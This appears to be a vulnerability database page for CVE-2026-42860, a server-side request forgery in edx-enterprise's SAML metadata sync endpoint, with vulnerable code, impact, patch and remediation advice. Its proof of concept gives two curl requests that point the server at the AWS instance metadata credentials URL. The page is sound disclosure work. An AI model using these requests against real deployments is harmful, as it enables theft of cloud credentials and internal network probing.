edx-enterprise CVE-2026-42860
HIGHSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The sync_provider_data endpoint in SAMLProviderDataViewSet fetches SAML metadata from a URL stored in SAMLProviderConfig.metadata_source. An authenticated user with the Enterprise Admin role can set this field to an arbitrary URL via the SAMLProviderConfigViewSet PATCH endpoint, then trigger a server-side HTTP request by calling sync_provider_data. The fetch in fetch_metadata_xml() passes the URL directly to requests.get() with no scheme enforcement, IP filtering, or timeout.
This vulnerability was introduced when the SAML admin viewsets were migrated from openedx-platform into edx-enterprise. A related fix for the equivalent fetch path in openedx-platform (the fetch_saml_metadata Celery task) was applied in GHSA-328g-7h4g-r2m9.
Details
Vulnerable code path:
enterprise/api/v1/views/saml_utils.py:
def fetch_metadata_xml(url):
log.info("Fetching %s", url)
if not url.lower().startswith('https'):
log.warning("This SAML metadata URL is not secure! (%s)", url)
response = requests.get(url, verify=True)
# No IP/scheme validation
response.raise_for_status()enterprise/api/v1/views/saml_provider_data.py:
@action(detail=False, methods=['post'], url_path='sync_provider_data')
def sync_provider_data(self, request):
...
metadata_url = saml_provider.metadata_source
# set via SAMLProviderConfig PATCH
xml = fetch_metadata_xml(metadata_url)
# triggers the fetchMissing protections:
- No HTTPS enforcement (HTTP is allowed; the warning is not enforced)
- No blocking of loopback (
127.0.0.0/8) or link-local (169.254.0.0/16) ranges - No blocking of RFC 1918 private ranges
- No request timeout
Proof of Concept
Prerequisites: Authenticated user with Enterprise Admin role for any enterprise customer with a configured SAML Identity Provider.
Step 1: Set a malicious metadata URL via the provider config endpoint:
curl -X PATCH 'https://<instance>/auth/saml/v0/provider_config/<pk>/' \
-H 'Authorization: Bearer <JWT>' \
-H 'Content-Type: application/json' \
-d '{"metadata_source": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'Step 2: Trigger the server-side fetch:
curl -X POST 'https://<instance>/auth/saml/v0/provider_data/sync_provider_data' \
-H 'Authorization: Bearer <JWT>' \
-H 'Content-Type: application/json' \
-d '{"enterprise_customer_uuid": "<uuid>"}'The server fetches the AWS metadata endpoint. Even though XML parsing will fail, the HTTP request is made and timing/error differences confirm reachability of internal addresses.
Impact
An Enterprise Admin can use this SSRF to:
- Steal cloud credentials: Access AWS/GCP/Azure instance metadata services to retrieve IAM temporary credentials, potentially enabling full cloud infrastructure compromise.
- Scan internal networks: Probe internal hosts, ports, and services behind the deployment's firewall.
- Access internal APIs: Reach databases, admin panels, or microservices not exposed to the internet.
Enterprise Admin is a delegated role typically granted to corporate training managers, not platform operators. It should not grant the ability to make the server issue arbitrary outbound HTTP requests.
Patches / Mitigations
Call validate_saml_metadata_url() (importable from common.djangoapps.third_party_auth.utils as of the openedx-platform fix in GHSA-328g-7h4g-r2m9) in fetch_metadata_xml() before calling requests.get(). A request timeout should also be added.
Operators should additionally enforce network-level egress filtering to block outbound connections from the Open edX server to 169.254.0.0/16 and RFC 1918 ranges as a complementary control, particularly to cover hostname-based URLs that cannot be validated at the application layer.
AnalysisAI
Server-Side Request Forgery in edx-enterprise 7.0.2-7.0.4 enables Enterprise Admins to steal cloud credentials and scan internal networks. Authenticated users with the Enterprise Admin role-typically delegated to training managers, not platform operators-can inject arbitrary URLs into SAMLProviderConfig.metadata_source and trigger server-side HTTP requests to internal infrastructure. Publicly available exploit code exists (proof-of-concept in GitHub advisory GHSA-64cv-vxpr-j6vc). Vendor-released patch: edx-enterprise 7.0.5. This mirrors a previously patched SSRF in openedx-platform (GHSA-328g-7h4g-r2m9), indicating recurring pattern in SAML metadata handling across Open edX components.
Technical ContextAI
The edx-enterprise package is a Django application that provides enterprise customer management for Open edX platforms. The vulnerability resides in the SAML provider administration REST API viewsets, specifically the sync_provider_data endpoint in SAMLProviderDataViewSet. When syncing SAML identity provider metadata, the fetch_metadata_xml() function in enterprise/api/v1/views/saml_utils.py passes user-controlled URLs directly to Python's requests.get() without validation. The code performs no IP address filtering (no checks for 127.0.0.0/8 loopback, 169.254.0.0/16 link-local, or RFC 1918 private ranges), lacks scheme enforcement (HTTP allowed despite HTTPS warning), and sets no request timeout. This is a classic CWE-918 Server-Side Request Forgery where insufficient input validation on URL parameters enables attackers to abuse the server as a proxy. The vulnerability was introduced during migration of SAML admin functionality from openedx-platform into edx-enterprise as a standalone package. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:C) confirms network-exploitable, low-complexity attack requiring only low-privilege authentication with scope change, reflecting that Enterprise Admin credentials provide access beyond their intended authorization boundary.
RemediationAI
Upgrade edx-enterprise to version 7.0.5 immediately via 'pip install --upgrade edx-enterprise==7.0.5'. The patch integrates validate_saml_metadata_url() function (imported from common.djangoapps.third_party_auth.utils in openedx-platform) into fetch_metadata_xml(), enforcing HTTPS-only schemes, blocking loopback/link-local/RFC1918 IP ranges, and adding request timeouts. Vendor advisory and patch details: https://github.com/openedx/edx-enterprise/security/advisories/GHSA-64cv-vxpr-j6vc. If immediate upgrade is not feasible, implement network-level egress filtering as a temporary compensating control: configure firewall rules to block outbound HTTP/HTTPS from the Open edX application server to 127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. Note this mitigation is incomplete (does not prevent hostname-based SSRF to internal DNS names) and may break legitimate external SAML metadata fetches if overly broad. Review Enterprise Admin role assignments and revoke where not operationally required; treat this role as sensitive given its API access. Audit SAML provider configurations for suspicious metadata_source URLs (particularly those pointing to IP addresses, non-standard ports, or internal hostnames) via database query or Django admin interface.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-64cv-vxpr-j6vc